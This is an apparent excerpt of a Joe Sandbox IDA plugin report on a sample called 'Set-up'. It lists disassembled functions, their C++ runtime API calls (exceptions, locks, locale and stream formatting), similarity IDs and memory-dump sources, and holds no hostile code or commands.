                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??1_$??0_??0exception@std@@ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 3660706833-988830941
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19BED
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC19BFE
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC19C1D
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C928), ref: 6BC19C33
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19C40
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19C69
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0bad_target@??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 467497307-988830941
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC17F6A
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC17F7B
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC17F9A
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C928), ref: 6BC17FB0
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC17FBD
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC17FE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0bad_target@??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 467497307-988830941
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1AAA5
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,0000001C), ref: 6BC1AAC1
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC1AAD7
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC1AAE3
                                                                                              • ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1AB0C
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AB19
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0exception@std@@??1_?set@event@ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 3618059816-988830941
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC2AEDF
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000004C), ref: 6BC2AF09
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A9F5: __EH_prolog3.LIBCMT ref: 6BC2A9FC
                                                                                                • Part of subcall function 6BC2A9F5: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA06
                                                                                                • Part of subcall function 6BC2A9F5: int.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA1D
                                                                                                • Part of subcall function 6BC2A9F5: std::locale::_Getfacet.LIBCPMT ref: 6BC2AA26
                                                                                                • Part of subcall function 6BC2A9F5: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA86
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • memmove_s.MSVCR100 ref: 6BC2AFC4
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000), ref: 6BC2B033
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC2B049
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,00000000,?,?,?,?,?,?), ref: 6BC2B072
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC2B0A4
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC2B0C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_V?$ostreambuf_iterator@_$W@std@@@2@W@std@@@std@@@std@@$Rep@?$num_put@_V32@_$V32@std::locale::facet::_$??1_?getloc@ios_base@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Putc@?$num_put@_Putgrouped@?$num_put@_Vlocale@2@memmove_sstd::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3216036925-0
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC2ACCE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000004C), ref: 6BC2ACF8
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A952: __EH_prolog3.LIBCMT ref: 6BC2A959
                                                                                                • Part of subcall function 6BC2A952: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A963
                                                                                                • Part of subcall function 6BC2A952: int.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A97A
                                                                                                • Part of subcall function 6BC2A952: std::locale::_Getfacet.LIBCPMT ref: 6BC2A983
                                                                                                • Part of subcall function 6BC2A952: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9E3
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • memmove_s.MSVCR100 ref: 6BC2ADB3
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000), ref: 6BC2AE22
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC2AE38
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,00000000,?,?,?,?,?,?), ref: 6BC2AE61
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC2AE93
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC2AEB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_V?$ostreambuf_iterator@_$W@std@@@2@W@std@@@std@@@std@@$Rep@?$num_put@_V32@_$V32@std::locale::facet::_$??1_?getloc@ios_base@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Putc@?$num_put@_Putgrouped@?$num_put@_Vlocale@2@memmove_sstd::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3216036925-0
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC2AAC6
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000004C), ref: 6BC2AAF2
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A8AF: __EH_prolog3.LIBCMT ref: 6BC2A8B6
                                                                                                • Part of subcall function 6BC2A8AF: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8C0
                                                                                                • Part of subcall function 6BC2A8AF: int.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8D7
                                                                                                • Part of subcall function 6BC2A8AF: std::locale::_Getfacet.LIBCPMT ref: 6BC2A8E0
                                                                                                • Part of subcall function 6BC2A8AF: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A940
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • memmove_s.MSVCR100 ref: 6BC2ABA7
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,0000004C), ref: 6BC2AC0E
                                                                                              • ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000004C), ref: 6BC2AC26
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,?,00000000,?,?,?,?,?,?), ref: 6BC2AC4E
                                                                                              • ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z.MSVCP100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC2AC82
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC2ACA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@V?$ostreambuf_iterator@$D@std@@@2@D@std@@@std@@@std@@V32@$Rep@?$num_put@$std::locale::facet::_$??1_?getloc@ios_base@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Putc@?$num_put@Putgrouped@?$num_put@Vlocale@2@memmove_sstd::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 1048808752-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC39244
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC3924E
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • _realloc_crt.MSVCR100(?,?,00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004), ref: 6BC39276
                                                                                              • ??0exception@std@@QAE@ABV01@@Z.MSVCR100(6BC70E9C,?,00000004), ref: 6BC392AD
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC392C3
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC392E2
                                                                                              • std::locale::facet::_Decref.LIBCPMT(00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC392F5
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC39316
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::locale::facet::_$??0exception@std@@??1_DecrefExceptionH_prolog3IncrefLockitLockit::_Lockit@std@@MtxlockThrowV01@@_realloc_crtstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 5258697-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DA36: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,?,?,6BC39160,6BC1CD3D), ref: 6BC1DA67
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,?,?,?,00000014), ref: 6BC1DF4B
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DF9F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?snextc@?$basic_streambuf@_H_prolog3_catchV12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 4098380366-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1DA36: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,?,?,6BC39160,6BC1CD3D), ref: 6BC1DA67
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,?,?,?,00000014), ref: 6BC1E0E0
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E134
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?snextc@?$basic_streambuf@_H_prolog3_catchV12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 4098380366-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DA36: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,?,?,6BC39160,6BC1CD3D), ref: 6BC1DA67
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD5B
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DDAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?clear@ios_base@std@@D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@H_prolog3_catchV12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 3987592289-0
                                                                                              • Opcode ID: 00f90778b385ca2cc68ca01b003318f67616faead2fdb31070617fafa0851fa5
                                                                                              • Instruction ID: 361907c8c5eaaa41d90b1f9fbb5038dec2c38600e4126c22b6227c50befd1f11
                                                                                              • Opcode Fuzzy Hash: 00f90778b385ca2cc68ca01b003318f67616faead2fdb31070617fafa0851fa5
                                                                                              • Instruction Fuzzy Hash: 393175746691009FC714EF78C1D0A5877F1BF44318714849DE156AB792EB3AEB42DB50
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                              • _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                              • ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@
                                                                                              • String ID:
                                                                                              • API String ID: 2939144689-0
                                                                                              • Opcode ID: f93cbbd2e78f460772179cda2e8321382775941de23ef14b6348f52255d4dbd9
                                                                                              • Instruction ID: 516a0ef65030969d8d0c29a4f0dfc49203cc748eba0aefcf8f866fd7b5a4343e
                                                                                              • Opcode Fuzzy Hash: f93cbbd2e78f460772179cda2e8321382775941de23ef14b6348f52255d4dbd9
                                                                                              • Instruction Fuzzy Hash: C611EC7681021CBBCB11DF99D4458CE7FBCEA94291F508166FA1597600EA78D748CBE1
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC17CEA
                                                                                              • _CxxThrowException.MSVCR100(6BC117B8,6BC4C848), ref: 6BC17D00
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC17D19
                                                                                              • ?_Xfunc@tr1@std@@YAXXZ.MSVCP100 ref: 6BC17D49
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@XZ.MSVCR100 ref: 6BC204A9
                                                                                                • Part of subcall function 6BC2049E: _CxxThrowException.MSVCR100(?,6BC48440), ref: 6BC204BF
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC48440), ref: 6BC204D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
